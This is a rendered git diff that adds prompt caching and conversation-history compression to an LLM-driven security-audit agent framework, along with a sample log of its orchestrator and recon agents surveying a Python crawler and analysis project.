- 流式输出: 支持逐 token 返回
""" """
from typing import Dict, Any, Optional import logging
from typing import Dict, Any, Optional, List
from ..base_adapter import BaseLLMAdapter from ..base_adapter import BaseLLMAdapter
from ..types import ( from ..types import (
LLMConfig, LLMConfig,
@ -14,6 +20,9 @@ from ..types import (
LLMError, LLMError,
DEFAULT_BASE_URLS, DEFAULT_BASE_URLS,
) )
from ..prompt_cache import prompt_cache_manager, estimate_tokens
logger = logging.getLogger(__name__)
class LiteLLMAdapter(BaseLLMAdapter): class LiteLLMAdapter(BaseLLMAdapter):
@ -108,6 +117,25 @@ class LiteLLMAdapter(BaseLLMAdapter):
# 构建消息 # 构建消息
messages = [{"role": msg.role, "content": msg.content} for msg in request.messages] messages = [{"role": msg.role, "content": msg.content} for msg in request.messages]
# 🔥 Prompt Caching: 为支持的 LLM 添加缓存标记
cache_enabled = False
if self.config.provider == LLMProvider.CLAUDE:
# 估算系统提示词 token 数
system_tokens = 0
for msg in messages:
if msg.get("role") == "system":
system_tokens += estimate_tokens(msg.get("content", ""))
messages, cache_enabled = prompt_cache_manager.process_messages(
messages=messages,
model=self.config.model,
provider=self.config.provider.value,
system_prompt_tokens=system_tokens,
)
if cache_enabled:
logger.debug(f"🔥 Prompt Caching enabled for {self.config.model}")
# 构建请求参数 # 构建请求参数
kwargs: Dict[str, Any] = { kwargs: Dict[str, Any] = {
"model": self._litellm_model, "model": self._litellm_model,
@ -170,6 +198,14 @@ class LiteLLMAdapter(BaseLLMAdapter):
total_tokens=response.usage.total_tokens or 0, total_tokens=response.usage.total_tokens or 0,
) )
# 🔥 更新 Prompt Cache 统计
if cache_enabled and hasattr(response.usage, "cache_creation_input_tokens"):
prompt_cache_manager.update_stats(
cache_creation_input_tokens=getattr(response.usage, "cache_creation_input_tokens", 0),
cache_read_input_tokens=getattr(response.usage, "cache_read_input_tokens", 0),
total_input_tokens=response.usage.prompt_tokens or 0,
)
return LLMResponse( return LLMResponse(
content=choice.message.content or "", content=choice.message.content or "",
model=response.model, model=response.model,

View File

@ -0,0 +1,349 @@
"""
Memory Compressor - 对话历史压缩器
当对话历史变得很长时自动进行压缩保持语义完整性的同时降低Token消耗
压缩策略
1. 保留所有系统消息
2. 保留最近的N条消息
3. 对较早的消息进行摘要压缩
4. 保留关键信息发现决策点错误
"""
import logging
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
# 配置常量
MAX_TOTAL_TOKENS = 100_000 # 最大总token数
MIN_RECENT_MESSAGES = 15 # 最少保留的最近消息数
COMPRESSION_THRESHOLD = 0.9 # 触发压缩的阈值90%
def estimate_tokens(text: str) -> int:
"""
估算文本的token数量
简单估算英文约4字符/token中文约2字符/token
"""
if not text:
return 0
# 简单估算
ascii_chars = sum(1 for c in text if ord(c) < 128)
non_ascii_chars = len(text) - ascii_chars
return (ascii_chars // 4) + (non_ascii_chars // 2) + 1
def get_message_tokens(msg: Dict[str, Any]) -> int:
"""获取单条消息的token数"""
content = msg.get("content", "")
if isinstance(content, str):
return estimate_tokens(content)
if isinstance(content, list):
total = 0
for item in content:
if isinstance(item, dict) and item.get("type") == "text":
total += estimate_tokens(item.get("text", ""))
return total
return 0
def extract_message_text(msg: Dict[str, Any]) -> str:
"""提取消息文本内容"""
content = msg.get("content", "")
if isinstance(content, str):
return content
if isinstance(content, list):
parts = []
for item in content:
if isinstance(item, dict):
if item.get("type") == "text":
parts.append(item.get("text", ""))
elif item.get("type") == "image_url":
parts.append("[IMAGE]")
return " ".join(parts)
return str(content)
class MemoryCompressor:
"""
对话历史压缩器
当对话历史超过token限制时自动压缩较早的消息
同时保留关键的安全审计上下文
"""
def __init__(
self,
max_total_tokens: int = MAX_TOTAL_TOKENS,
min_recent_messages: int = MIN_RECENT_MESSAGES,
llm_service=None,
):
"""
初始化压缩器
Args:
max_total_tokens: 最大总token数
min_recent_messages: 最少保留的最近消息数
llm_service: LLM服务用于生成摘要可选
"""
self.max_total_tokens = max_total_tokens
self.min_recent_messages = min_recent_messages
self.llm_service = llm_service
def compress_history(
self,
messages: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""
压缩对话历史
策略
1. 保留所有系统消息
2. 保留最近的N条消息
3. 对较早的消息进行摘要压缩
4. 保留关键信息
Args:
messages: 原始消息列表
Returns:
压缩后的消息列表
"""
if not messages:
return messages
# 分离系统消息和普通消息
system_msgs = []
regular_msgs = []
for msg in messages:
if msg.get("role") == "system":
system_msgs.append(msg)
else:
regular_msgs.append(msg)
# 计算当前总token数
total_tokens = sum(get_message_tokens(msg) for msg in messages)
# 如果未超过阈值,不需要压缩
if total_tokens <= self.max_total_tokens * COMPRESSION_THRESHOLD:
return messages
logger.info(f"Compressing conversation history: {total_tokens} tokens -> target: {int(self.max_total_tokens * 0.7)}")
# 分离最近消息和较早消息
recent_msgs = regular_msgs[-self.min_recent_messages:]
old_msgs = regular_msgs[:-self.min_recent_messages] if len(regular_msgs) > self.min_recent_messages else []
if not old_msgs:
return messages
# 压缩较早的消息
compressed = self._compress_messages(old_msgs)
# 重新组合
result = system_msgs + compressed + recent_msgs
new_total = sum(get_message_tokens(msg) for msg in result)
logger.info(f"Compression complete: {total_tokens} -> {new_total} tokens ({100 - new_total * 100 // total_tokens}% reduction)")
return result
def _compress_messages(
self,
messages: List[Dict[str, Any]],
chunk_size: int = 10,
) -> List[Dict[str, Any]]:
"""
压缩消息列表
Args:
messages: 要压缩的消息
chunk_size: 每次压缩的消息数量
Returns:
压缩后的消息列表
"""
if not messages:
return []
compressed = []
# 按chunk分组压缩
for i in range(0, len(messages), chunk_size):
chunk = messages[i:i + chunk_size]
summary = self._summarize_chunk(chunk)
if summary:
compressed.append(summary)
return compressed
def _summarize_chunk(self, messages: List[Dict[str, Any]]) -> Optional[Dict[str, Any]]:
"""
摘要一组消息
Args:
messages: 要摘要的消息
Returns:
摘要消息
"""
if not messages:
return None
# 提取关键信息
key_info = self._extract_key_info(messages)
# 构建摘要
summary_parts = []
if key_info["findings"]:
summary_parts.append(f"发现: {', '.join(key_info['findings'][:5])}")
if key_info["tools_used"]:
summary_parts.append(f"使用工具: {', '.join(key_info['tools_used'][:5])}")
if key_info["decisions"]:
summary_parts.append(f"决策: {', '.join(key_info['decisions'][:3])}")
if key_info["errors"]:
summary_parts.append(f"错误: {', '.join(key_info['errors'][:2])}")
if not summary_parts:
# 如果没有提取到关键信息,生成简单摘要
summary_parts.append(f"[已压缩 {len(messages)} 条历史消息]")
summary_text = " | ".join(summary_parts)
return {
"role": "assistant",
"content": f"<context_summary message_count='{len(messages)}'>{summary_text}</context_summary>",
}
def _extract_key_info(self, messages: List[Dict[str, Any]]) -> Dict[str, List[str]]:
"""
从消息中提取关键信息
Args:
messages: 消息列表
Returns:
关键信息字典
"""
import re
key_info = {
"findings": [],
"tools_used": [],
"decisions": [],
"errors": [],
"files_analyzed": [],
}
for msg in messages:
text = extract_message_text(msg).lower()
# 提取发现的漏洞类型
vuln_patterns = {
"sql": "SQL注入",
"xss": "XSS",
"ssrf": "SSRF",
"idor": "IDOR",
"auth": "认证问题",
"injection": "注入漏洞",
"traversal": "路径遍历",
"deserialization": "反序列化",
"hardcoded": "硬编码凭证",
"secret": "密钥泄露",
}
for pattern, label in vuln_patterns.items():
if pattern in text and ("发现" in text or "漏洞" in text or "finding" in text or "vulnerability" in text):
if label not in key_info["findings"]:
key_info["findings"].append(label)
# 提取工具使用
tool_match = re.search(r'action:\s*(\w+)', text, re.IGNORECASE)
if tool_match:
tool = tool_match.group(1)
if tool not in key_info["tools_used"]:
key_info["tools_used"].append(tool)
# 提取分析的文件
file_patterns = [
r'读取文件[:]\s*([^\s\n]+)',
r'分析文件[:]\s*([^\s\n]+)',
r'file[_\s]?path[:]\s*["\']?([^\s\n"\']+)',
r'\.py|\.js|\.ts|\.java|\.go|\.php',
]
for pattern in file_patterns[:3]:
matches = re.findall(pattern, text)
for match in matches:
if match not in key_info["files_analyzed"]:
key_info["files_analyzed"].append(match)
# 提取决策
if any(kw in text for kw in ["决定", "决策", "decision", "选择", "采用"]):
# 尝试提取决策内容
decision_match = re.search(r'(决定|决策|decision)[:\s]*([^\n。.]{10,50})', text)
if decision_match:
key_info["decisions"].append(decision_match.group(2)[:50])
else:
key_info["decisions"].append("做出决策")
# 提取错误
if any(kw in text for kw in ["错误", "失败", "error", "failed", "exception"]):
error_match = re.search(r'(错误|error|failed)[:\s]*([^\n]{10,50})', text, re.IGNORECASE)
if error_match:
key_info["errors"].append(error_match.group(2)[:50])
else:
key_info["errors"].append("遇到错误")
# 去重并限制数量
for key in key_info:
key_info[key] = list(set(key_info[key]))[:5]
return key_info
def should_compress(self, messages: List[Dict[str, Any]]) -> bool:
"""
检查是否需要压缩
Args:
messages: 消息列表
Returns:
是否需要压缩
"""
total_tokens = sum(get_message_tokens(msg) for msg in messages)
return total_tokens > self.max_total_tokens * COMPRESSION_THRESHOLD
# 便捷函数
def compress_conversation(
messages: List[Dict[str, Any]],
max_tokens: int = MAX_TOTAL_TOKENS,
) -> List[Dict[str, Any]]:
"""
压缩对话历史的便捷函数
Args:
messages: 消息列表
max_tokens: 最大token数
Returns:
压缩后的消息列表
"""
compressor = MemoryCompressor(max_total_tokens=max_tokens)
return compressor.compress_history(messages)

View File

@ -0,0 +1,333 @@
"""
Prompt Caching 模块
为支持缓存的 LLM Anthropic Claude提供 Prompt 缓存功能
通过在系统提示词和早期对话中添加缓存标记减少重复处理
显著降低 Token 消耗和响应延迟
支持的 LLM:
- Anthropic Claude (claude-3-5-sonnet, claude-3-opus, claude-3-haiku)
- OpenAI (部分模型支持)
缓存策略:
- 短对话<10: 仅缓存系统提示词
- 中等对话10-30: 缓存系统提示词 + 前5轮对话
- 长对话>30: 多个缓存点动态调整
"""
import logging
from typing import Dict, Any, List, Optional, Tuple
from dataclasses import dataclass, field
from enum import Enum
logger = logging.getLogger(__name__)
class CacheStrategy(str, Enum):
"""缓存策略"""
NONE = "none" # 不缓存
SYSTEM_ONLY = "system_only" # 仅缓存系统提示词
SYSTEM_AND_EARLY = "system_early" # 缓存系统提示词和早期对话
MULTI_POINT = "multi_point" # 多缓存点
@dataclass
class CacheConfig:
"""缓存配置"""
enabled: bool = True
strategy: CacheStrategy = CacheStrategy.SYSTEM_AND_EARLY
# 缓存阈值
min_system_prompt_tokens: int = 1000 # 系统提示词最小 token 数才启用缓存
early_messages_count: int = 5 # 早期对话缓存的消息数
# 多缓存点配置
multi_point_interval: int = 10 # 多缓存点间隔(消息数)
max_cache_points: int = 4 # 最大缓存点数量
@dataclass
class CacheStats:
"""缓存统计"""
cache_hits: int = 0
cache_misses: int = 0
cached_tokens: int = 0
total_tokens: int = 0
@property
def hit_rate(self) -> float:
total = self.cache_hits + self.cache_misses
return self.cache_hits / total if total > 0 else 0.0
@property
def token_savings(self) -> float:
return self.cached_tokens / self.total_tokens if self.total_tokens > 0 else 0.0
class PromptCacheManager:
"""
Prompt 缓存管理器
负责:
1. 检测 LLM 是否支持缓存
2. 根据对话长度选择缓存策略
3. 为消息添加缓存标记
4. 统计缓存效果
"""
# 支持缓存的模型
CACHEABLE_MODELS = {
# Anthropic Claude
"claude-3-5-sonnet": True,
"claude-3-5-sonnet-20241022": True,
"claude-3-opus": True,
"claude-3-opus-20240229": True,
"claude-3-haiku": True,
"claude-3-haiku-20240307": True,
"claude-3-sonnet": True,
"claude-3-sonnet-20240229": True,
# OpenAI (部分支持)
"gpt-4-turbo": False, # 暂不支持
"gpt-4o": False,
"gpt-4o-mini": False,
}
# Anthropic 缓存标记
ANTHROPIC_CACHE_CONTROL = {"type": "ephemeral"}
def __init__(self, config: Optional[CacheConfig] = None):
self.config = config or CacheConfig()
self.stats = CacheStats()
self._cache_enabled_for_session = True
def supports_caching(self, model: str, provider: str) -> bool:
"""
检查模型是否支持缓存
Args:
model: 模型名称
provider: 提供商名称
Returns:
是否支持缓存
"""
if not self.config.enabled:
return False
# Anthropic Claude 支持缓存
if provider.lower() in ["anthropic", "claude"]:
# 检查模型名称
for cacheable_model in self.CACHEABLE_MODELS:
if cacheable_model in model.lower():
return self.CACHEABLE_MODELS.get(cacheable_model, False)
return False
def determine_strategy(
self,
messages: List[Dict[str, Any]],
system_prompt_tokens: int = 0,
) -> CacheStrategy:
"""
根据对话状态确定缓存策略
Args:
messages: 消息列表
system_prompt_tokens: 系统提示词的 token
Returns:
缓存策略
"""
if not self.config.enabled:
return CacheStrategy.NONE
# 系统提示词太短,不值得缓存
if system_prompt_tokens < self.config.min_system_prompt_tokens:
return CacheStrategy.NONE
message_count = len(messages)
# 短对话:仅缓存系统提示词
if message_count < 10:
return CacheStrategy.SYSTEM_ONLY
# 中等对话:缓存系统提示词和早期对话
if message_count < 30:
return CacheStrategy.SYSTEM_AND_EARLY
# 长对话:多缓存点
return CacheStrategy.MULTI_POINT
def add_cache_markers_anthropic(
self,
messages: List[Dict[str, Any]],
strategy: CacheStrategy,
) -> List[Dict[str, Any]]:
"""
Anthropic Claude 消息添加缓存标记
Anthropic 的缓存格式:
- content 中使用 cache_control 字段
- 支持 text 类型的 content block
Args:
messages: 原始消息列表
strategy: 缓存策略
Returns:
添加了缓存标记的消息列表
"""
if strategy == CacheStrategy.NONE:
return messages
cached_messages = []
for i, msg in enumerate(messages):
new_msg = msg.copy()
# 系统提示词缓存
if msg.get("role") == "system":
new_msg = self._add_cache_to_message(new_msg)
cached_messages.append(new_msg)
continue
# 早期对话缓存
if strategy in [CacheStrategy.SYSTEM_AND_EARLY, CacheStrategy.MULTI_POINT]:
if i <= self.config.early_messages_count:
new_msg = self._add_cache_to_message(new_msg)
# 多缓存点
if strategy == CacheStrategy.MULTI_POINT:
if i > 0 and i % self.config.multi_point_interval == 0:
cache_point_count = i // self.config.multi_point_interval
if cache_point_count <= self.config.max_cache_points:
new_msg = self._add_cache_to_message(new_msg)
cached_messages.append(new_msg)
return cached_messages
def _add_cache_to_message(self, msg: Dict[str, Any]) -> Dict[str, Any]:
"""
为单条消息添加缓存标记
Args:
msg: 原始消息
Returns:
添加了缓存标记的消息
"""
content = msg.get("content", "")
# 如果 content 是字符串,转换为 content block 格式
if isinstance(content, str):
msg["content"] = [
{
"type": "text",
"text": content,
"cache_control": self.ANTHROPIC_CACHE_CONTROL,
}
]
elif isinstance(content, list):
# 已经是 content block 格式,为最后一个 block 添加缓存
if content:
last_block = content[-1]
if isinstance(last_block, dict):
last_block["cache_control"] = self.ANTHROPIC_CACHE_CONTROL
return msg
def process_messages(
self,
messages: List[Dict[str, Any]],
model: str,
provider: str,
system_prompt_tokens: int = 0,
) -> Tuple[List[Dict[str, Any]], bool]:
"""
处理消息添加缓存标记
Args:
messages: 原始消息列表
model: 模型名称
provider: 提供商名称
system_prompt_tokens: 系统提示词 token
Returns:
(处理后的消息列表, 是否启用了缓存)
"""
if not self.supports_caching(model, provider):
return messages, False
strategy = self.determine_strategy(messages, system_prompt_tokens)
if strategy == CacheStrategy.NONE:
return messages, False
# 根据提供商选择缓存方法
if provider.lower() in ["anthropic", "claude"]:
cached_messages = self.add_cache_markers_anthropic(messages, strategy)
logger.debug(f"Applied {strategy.value} caching strategy for Anthropic")
return cached_messages, True
return messages, False
def update_stats(
self,
cache_creation_input_tokens: int = 0,
cache_read_input_tokens: int = 0,
total_input_tokens: int = 0,
):
"""
更新缓存统计
Args:
cache_creation_input_tokens: 缓存创建的 token
cache_read_input_tokens: 缓存读取的 token
total_input_tokens: 总输入 token
"""
if cache_read_input_tokens > 0:
self.stats.cache_hits += 1
self.stats.cached_tokens += cache_read_input_tokens
else:
self.stats.cache_misses += 1
self.stats.total_tokens += total_input_tokens
def get_stats_summary(self) -> Dict[str, Any]:
"""获取缓存统计摘要"""
return {
"cache_hits": self.stats.cache_hits,
"cache_misses": self.stats.cache_misses,
"hit_rate": f"{self.stats.hit_rate:.2%}",
"cached_tokens": self.stats.cached_tokens,
"total_tokens": self.stats.total_tokens,
"token_savings": f"{self.stats.token_savings:.2%}",
}
# 全局缓存管理器实例
prompt_cache_manager = PromptCacheManager()
def estimate_tokens(text: str) -> int:
"""
估算文本的 token 数量
简单估算英文约 4 字符/token中文约 2 字符/token
Args:
text: 文本内容
Returns:
估算的 token
"""
if not text:
return 0
# 统计中文字符
chinese_chars = sum(1 for c in text if '\u4e00' <= c <= '\u9fff')
other_chars = len(text) - chinese_chars
# 中文约 2 字符/token其他约 4 字符/token
return int(chinese_chars / 2 + other_chars / 4)

809
backend/test_msg.md Normal file
View File

@ -0,0 +1,809 @@
14:22:48
🔗 Connected to audit stream
14:23:04
Orchestrator
Thought: 我需要对这个复杂的多组件项目进行安全审计。项目包含多个引擎MediaEngine, MindSpider, QueryEngine, ReportEngine, InsightEngine, ForumEngine和相关的 Streamlit 报告应用,使用 Python 和 JavaScript 开发。首先,我需要全面了解项目的结构、技术栈和入口点,以便确定审计的重点区域。我将从 recon Agent 开始,收集项目的基本信息。
14:23:08
📤 调度 recon Agent: 分析项目结构、技术栈、入口点和主要组件...
Orchestrator
14:23:18
Recon
Thought: 我需要开始收集项目信息。首先我应该了解项目的整体结构包括目录布局和文件组织。这将帮助我识别项目的基本架构和组件。我将从根目录开始使用list_files工具查看项目结构。
14:23:22
Completed: list_files
Recon
4ms
14:23:26
Recon
Thought: 从项目结构来看,这是一个包含多个组件的复杂项目,主要包括:
1. MediaEngine - 一个Python模块似乎处理媒体相关功能
2. MindSpider - 包含爬虫功能特别是DeepSentimentCrawling
3. 根目录有一些Python应用文件如app.py、config.py等
4. 有Docker相关文件表明这是一个容器化项目
我需要进一步了解技术栈和项目配置。首先我应该查看根目录的配置文件如requirements.txt、config.py和app.py以了解主要的技术栈和入口点。
14:23:34
Completed: read_file
Recon
3ms
Input:
{
"file_path": "requirements.txt"
}
Output:
null
14:23:35
Recon
Thought: 从requirements.txt可以看出这是一个复杂的项目使用了多种技术栈
1. Web框架Flask、Streamlit、FastAPI
2. 实时通信Flask-SocketIO、python-socketio
3. 数据库MySQL、PostgreSQL、SQLite、Redis
4. 爬虫工具Playwright、BeautifulSoup等
5. 机器学习PyTorch、Transformers等
6. 其他工具OpenAI API、Tavily搜索等
现在我需要查看主要的入口点文件如app.py了解应用程序的主要结构和功能。
14:23:38
Completed: read_file
Recon
1ms
14:23:39
Recon
Thought: 从app.py文件的前500行可以看出这是一个Flask应用用于统一管理三个Streamlit应用。它包含以下关键信息
1. 使用Flask作为主框架Flask-SocketIO用于实时通信
2. 配置了多个API密钥和引擎Insight Engine、Media Engine、Query Engine等
3. 使用MindSpider模块进行爬虫功能
4. 尝试导入ReportEngine作为蓝图
5. 配置了多个数据库连接参数
我需要继续查看app.py的其余部分以了解完整的应用结构和入口点。同时我也应该查看config.py文件来了解配置结构。
14:23:44
Completed: read_file
Recon
0ms
14:23:44
Recon
Thought: 从app.py的501-1000行可以看出这个应用管理多个Streamlit子进程
1. 有四个主要进程insight、media、query和forum
2. 每个进程都有独立的端口insight: 8501, media: 8502, query: 8503
3. 使用队列进行进程间通信
4. 有日志记录功能将输出写入文件并通过WebSocket发送到前端
5. 有启动Streamlit应用的函数
我需要继续查看app.py的剩余部分以了解完整的API路由和功能。同时我也应该查看config.py文件来了解配置结构。
14:23:48
Completed: read_file
Recon
2ms
14:23:49
Recon
Thought: 从app.py的最后部分可以看出这个应用提供了多个API端点
1. 日志相关API读取和测试日志
2. ForumEngine相关API启动/停止论坛监控,获取论坛日志
3. 搜索API统一搜索接口可以向运行中的不同引擎发送搜索请求
4. 每个Streamlit应用都有对应的API端口insight: 8601, media: 8602, query: 8603
现在我需要查看config.py文件来了解配置结构以及查看SingleEngineApp目录来了解各个引擎的实现。
14:23:55
Completed: read_file
Recon
1ms
14:23:56
Recon
Thought: 从config.py文件可以看出这是一个使用Pydantic Settings进行配置管理的项目包含多个API密钥和配置项
1. 数据库配置支持MySQL和PostgreSQL
2. 多个LLM引擎配置Insight Engine、Media Engine、Query Engine、Report Engine等
3. 网络工具配置Tavily API、Bocha API等
4. 每个引擎都有对应的API密钥、基础URL和模型名称
现在我需要查看SingleEngineApp目录了解各个引擎的实现以及查看MindSpider目录了解爬虫功能的实现。
14:24:02
Completed: list_files
Recon
0ms
14:24:03
Recon
Thought: SingleEngineApp目录包含三个Streamlit应用文件分别对应三个不同的引擎
1. insight_engine_streamlit_app.py - 洞察引擎
2. media_engine_streamlit_app.py - 媒体引擎
3. query_engine_streamlit_app.py - 查询引擎
我需要查看这些文件来了解各个引擎的具体实现和功能。首先查看洞察引擎的实现。
14:24:07
Completed: read_file
Recon
0ms
14:24:07
Recon
Thought: 从insight_engine_streamlit_app.py可以看出这是一个Streamlit应用为Insight Agent提供Web界面。主要功能包括
1. 接收URL参数中的查询内容
2. 使用DeepSearchAgent执行深度搜索和分析
3. 生成报告结构并处理段落
4. 执行反思循环以改进分析结果
5. 生成最终报告
现在我需要查看媒体引擎和查询引擎的实现以及MindSpider目录了解爬虫功能的实现。
14:24:12
Completed: read_file
Recon
1ms
14:26:02
Recon
Thought: 从media_engine_streamlit_app.py可以看出这是Media Agent的Streamlit界面主要功能包括
1. 支持多模态能力,可以处理视频、图文、直播等内容
2. 支持多种搜索引擎BochaAPI和AnspireAPI
3. 使用Gemini模型作为默认LLM
4. 接收URL参数中的查询内容并自动执行搜索
现在我需要查看查询引擎的实现以及MindSpider目录了解爬虫功能的实现。
14:26:07
Completed: read_file
Recon
2ms
14:26:10
Recon
Thought: 从query_engine_streamlit_app.py可以看出这是Query Agent的Streamlit界面主要功能包括
1. 具备强大的网页搜索能力
2. 注重国内外资源相结合理解舆情
3. 使用DeepSeek模型作为默认LLM
4. 使用Tavily API进行网络搜索
5. 与Insight Agent类似也执行报告结构生成、段落处理和反思循环
现在我需要查看MindSpider目录了解爬虫功能的实现。
14:26:14
Completed: list_files
Recon
2ms
14:26:14
Recon
Thought: MindSpider目录包含一个复杂的爬虫系统主要结构包括
1. DeepSentimentCrawling/MediaCrawler - 媒体爬虫模块
- 包含缓存系统
- 数据库模块
- 代理系统
- 各种工具函数
- 主程序入口
2. DeepSentimentCrawling - 深度情感爬虫
- 关键词管理器
- 平台爬虫
- 主程序
3. 根目录的MindSpider文件
- 配置文件
- 主程序
我需要查看MindSpider的主程序和配置文件了解爬虫系统的整体架构和功能。
14:26:18
Completed: read_file
Recon
2ms
14:26:20
Recon
Thought: 从MindSpider/main.py可以看出这是一个AI爬虫项目的主程序集成了两个核心模块
1. BroadTopicExtraction - 广泛主题提取
2. DeepSentimentCrawling - 深度情感爬虫
主要功能包括:
- 检查配置和数据库连接
- 初始化数据库
- 运行爬虫任务
- 支持多种数据库MySQL、PostgreSQL
现在我需要查看MindSpider的配置文件了解具体的配置项。
14:26:24
Completed: read_file
Recon
1ms
14:26:25
Recon
Thought: 从MindSpider/config.py可以看出这是一个使用Pydantic Settings进行配置管理的模块主要包含
1. 数据库配置支持MySQL和PostgreSQL
2. MindSpider API配置包括API密钥、基础URL和模型名称
3. 使用.env文件进行环境变量管理
现在我需要查看DeepSentimentCrawling模块了解爬虫的具体实现。
14:26:29
Completed: read_file
Recon
2ms
14:27:09
Recon
Thought: 从DeepSentimentCrawling/main.py可以看出这是一个深度情感爬取模块主要功能包括
1. 支持多个平台:小红书(xhs)、抖音(dy)、快手(ks)、哔哩哔哩(bili)、微博(wb)、贴吧(tieba)、知乎(zhihu)
2. 基于关键词进行爬取
3. 支持每日爬取任务和单个平台爬取
4. 使用关键词管理器(KeywordManager)和平台爬虫(PlatformCrawler)
现在我需要查看平台爬虫的实现,了解具体的爬取逻辑。
14:27:19
Completed: read_file
Recon
3ms
14:27:19
✅ recon Agent 完成
Orchestrator
14:27:39
Orchestrator
Thought: Recon Agent 的执行结果没有返回任何有用的信息,项目结构、技术栈、入口点等都是空的。这可能是因为 Agent 需要更具体的指导。我将尝试一个更具体的 recon 任务,重点关注配置文件和主要代码文件,因为这些通常包含安全敏感信息。
14:27:43
📤 调度 recon Agent: 重点分析配置文件(config.py, .env.example)、主要入口文件(app.py, report_engine_only.py)和依赖文件(requirements.txt)...
Orchestrator
14:28:44
Recon
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和文件组织。这将帮助我识别项目类型、技术栈和关键组件。我将从根目录开始,递归列出所有文件和目录。
14:28:51
Completed: list_files
Recon
4ms
14:28:51
Recon
Thought: 从文件列表中,我可以看到这是一个复杂的项目,包含多个组件:
1. MediaEngine - 一个Python模块似乎用于媒体处理和报告生成
2. MindSpider/DeepSentimentCrawling - 一个网络爬虫项目,用于情感分析爬取
3. 根目录有一些配置文件和主程序
我需要进一步了解项目的技术栈和依赖关系。首先我应该查看根目录的配置文件如requirements.txt、package.json等以了解项目使用的依赖和技术栈。
14:28:56
Completed: read_file
Recon
1ms
14:29:05
Recon
Thought: 从requirements.txt文件中我可以看到这是一个复杂的项目使用了多种技术栈
1. Web框架Flask、Streamlit、FastAPI
2. 数据库MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
3. 爬虫工具Playwright、BeautifulSoup、lxml等
4. 机器学习PyTorch、Transformers、scikit-learn等
5. 其他工具OpenAI API、数据处理、可视化等
现在我应该查看MindSpider/DeepSentimentCrawling目录下的package.json文件以了解前端或Node.js相关的依赖。
14:29:28
Completed: read_file
Recon
0ms
14:29:29
Recon
Thought: package.json文件显示这是一个使用VitePress的文档项目没有前端应用依赖。现在我应该查看MindSpider/DeepSentimentCrawler目录下的requirements.txt文件以了解爬虫组件的具体依赖。
14:29:32
Completed: read_file
Recon
1ms
14:29:32
Recon
Thought: 现在我已经了解了项目的主要依赖。接下来我应该查看主要的入口点文件如app.py、main.py等以了解应用程序的启动点和主要功能。首先查看根目录的app.py文件。
14:29:35
Completed: read_file
Recon
2ms
14:29:35
Recon
Thought: app.py文件很长我需要查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
14:29:38
Completed: read_file
Recon
2ms
14:29:39
Recon
Thought: app.py文件非常长我需要继续查看剩余部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
14:29:41
Completed: read_file
Recon
1ms
14:29:42
Recon
Thought: app.py文件很长我已经看到了大部分内容但还需要查看最后部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
14:29:43
Completed: read_file
Recon
1ms
14:29:46
Recon
Thought: 现在我已经了解了app.py文件的主要内容。这是一个Flask应用用于管理多个Streamlit应用。接下来我应该查看MindSpider/main.py文件以了解爬虫组件的主要功能。
14:29:51
Completed: read_file
Recon
4ms
14:29:53
Recon
Thought: MindSpider/main.py文件也很长我需要查看更多内容来了解爬虫组件的主要功能。让我继续读取文件的剩余部分。
14:29:55
Completed: read_file
Recon
2ms
14:29:56
Recon
Thought: 我已经了解了MindSpider/main.py文件的主要内容。这是一个爬虫项目的主程序集成了BroadTopicExtraction和DeepSentimentCrawling两个核心模块。接下来我应该查看配置文件以了解项目的配置结构和敏感信息。
14:29:59
Completed: read_file
Recon
6ms
Input:
{
"file_path": "config.py"
}
Output:
null
14:30:03
Recon
Thought: config.py文件很长我需要查看更多内容以了解完整的配置结构。让我继续读取文件的剩余部分。
14:30:04
Completed: read_file
Recon
1ms
14:30:05
Recon
Thought: 现在我已经了解了config.py文件的主要内容。这是一个使用pydantic-settings管理的全局配置文件包含了数据库配置、LLM API配置、网络工具配置等。接下来我应该查看.env.example文件以了解环境变量的配置示例。
14:30:09
Completed: read_file
Recon
1ms
14:30:10
Recon
Thought: 现在我已经了解了项目的主要配置文件。接下来我应该查看一些关键的入口点文件如SingleEngineApp目录下的文件以了解各个引擎的应用程序结构。首先查看SingleEngineApp目录结构。
14:30:13
Completed: list_files
Recon
1ms
14:30:14
Recon
Thought: SingleEngineApp目录包含三个Streamlit应用程序文件。我应该查看其中一个文件以了解应用程序的结构和功能。让我先查看insight_engine_streamlit_app.py文件。
14:30:17
Completed: read_file
Recon
0ms
14:30:17
✅ recon Agent 完成
Orchestrator
14:30:17
Orchestrator
尝试直接分析项目中的关键文件,看看能否获取更多信息。我将尝试使用 analysis Agent 来分析项目中的主要文件,特别是配置文件和入口文件。
14:30:20
📤 调度 analysis Agent: 分析项目中的关键文件包括config.py, app.py, report_engine_only.py等主要入口文件...
Orchestrator
14:30:26
Analysis
Thought: 我需要首先了解这个项目的结构和内容,以便制定合适的分析策略。由于项目信息有限,我不知道项目的具体语言和框架,所以我应该先探索项目结构,然后根据文件类型选择合适的分析工具。
14:30:28
Completed: list_files
Analysis
2ms
14:30:50
Analysis
Thought: 从项目结构来看这是一个Python项目主要包含两个主要部分MediaEngine和MindSpider。项目中有多个Python文件包括配置文件、主程序文件和工具文件。我注意到有一些敏感文件如.env.example可能包含配置信息。接下来我应该先查看主要的入口文件和配置文件了解项目的基本功能然后进行安全分析。
14:30:57
Completed: read_file
Analysis
4ms
14:30:58
Analysis
Thought: 我已经看到了app.py文件的部分内容这是一个Flask应用用于管理三个Streamlit应用。我注意到一些安全相关信息
1. Flask应用的SECRET_KEY是硬编码的
2. 有多个API密钥配置
3. 使用了subprocess模块
4. 有socketio通信
我需要继续查看app.py的其余部分然后检查配置文件和其他关键文件。让我先读取app.py的剩余部分。
14:31:02
Completed: read_file
Analysis
2ms
14:31:02
Analysis
Thought: 我已经看到了app.py的部分内容这是一个Flask应用用于管理多个Streamlit应用。我注意到一些潜在的安全问题
1. 硬编码的SECRET_KEY
2. 使用subprocess模块启动子进程
3. 文件操作可能存在路径遍历风险
让我继续查看配置文件了解项目的配置情况然后使用semgrep进行静态分析这样可以更系统地发现潜在的安全问题。
14:31:05
Completed: read_file
Analysis
1ms
14:31:18
Analysis
